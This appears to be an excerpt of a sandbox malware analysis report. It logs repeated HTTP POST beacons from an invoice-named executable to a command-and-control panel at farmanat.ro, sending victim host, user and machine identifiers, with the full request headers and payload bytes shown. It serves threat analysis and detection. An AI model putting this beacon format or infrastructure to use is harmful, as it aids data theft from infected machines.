Nov 25, 2021 10:50:14.729454994 CET	6659	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:50:13 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
245	192.168.11.20	50087	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:50:15.146123886 CET	6660	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:50:15.179420948 CET	6660	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:50:15.229315996 CET	6660	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:50:14 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
246	192.168.11.20	50088	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:50:15.653331041 CET	6661	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:50:15.687103987 CET	6661	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:50:15.736463070 CET	6662	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:50:14 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
247	192.168.11.20	50089	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:50:16.166461945 CET	6662	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:50:16.200181961 CET	6663	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:50:16.252347946 CET	6663	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:50:15 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
248	192.168.11.20	50090	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:50:16.686570883 CET	6664	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:50:16.720089912 CET	6664	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:50:16.771271944 CET	6664	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:50:15 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
249	192.168.11.20	50091	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:50:17.195199013 CET	6665	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:50:17.229708910 CET	6665	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:50:17.283452988 CET	6666	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:50:16 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
25	192.168.11.20	49860	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:48:17.734632015 CET	6339	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:48:17.768721104 CET	6340	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:48:17.821785927 CET	6340	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:48:16 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
250	192.168.11.20	50092	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:50:17.638428926 CET	6666	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:50:17.671746016 CET	6667	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:50:17.720838070 CET	6667	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:50:16 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
251	192.168.11.20	50093	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:50:18.158986092 CET	6668	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:50:18.193180084 CET	6668	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:50:18.244380951 CET	6668	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:50:17 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
252	192.168.11.20	50094	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:50:18.673645020 CET	6669	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:50:18.707741976 CET	6669	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:50:18.757035971 CET	6670	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:50:17 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
253	192.168.11.20	50095	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:50:19.184221983 CET	6670	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:50:19.217792988 CET	6671	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:50:19.270900965 CET	6671	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:50:18 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
254	192.168.11.20	50096	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:50:19.685636044 CET	6672	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:50:19.719994068 CET	6672	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:50:19.776088953 CET	6672	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:50:18 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
255	192.168.11.20	50097	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:50:20.207252979 CET	6673	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:50:20.241003990 CET	6673	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:50:20.294841051 CET	6674	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:50:19 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
256	192.168.11.20	50098	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:50:20.723423958 CET	6674	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:50:20.756654024 CET	6675	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:50:20.805862904 CET	6675	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:50:19 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
257	192.168.11.20	50099	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:50:21.159996986 CET	6676	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:50:21.193694115 CET	6676	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:50:21.243401051 CET	6676	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:50:20 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
258	192.168.11.20	50100	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:50:21.648991108 CET	6677	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:50:21.682538033 CET	6677	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:50:21.732023001 CET	6678	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:50:20 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
259	192.168.11.20	50101	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:50:22.166712999 CET	6678	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:50:22.200891018 CET	6679	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:50:22.252677917 CET	6679	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:50:21 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
26	192.168.11.20	49861	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:48:18.417273998 CET	6341	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:48:18.450839996 CET	6341	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:48:18.506346941 CET	6341	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:48:17 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
260	192.168.11.20	50102	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:50:22.680855989 CET	6680	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:50:22.715112925 CET	6680	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:50:22.764718056 CET	6680	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:50:21 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
261	192.168.11.20	50103	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:50:23.190149069 CET	6681	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:50:23.224267006 CET	6681	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:50:23.279185057 CET	6682	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:50:22 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
262	192.168.11.20	50104	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:50:23.717956066 CET	6682	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:50:23.751558065 CET	6683	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:50:23.802470922 CET	6683	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:50:22 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
263	192.168.11.20	50105	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
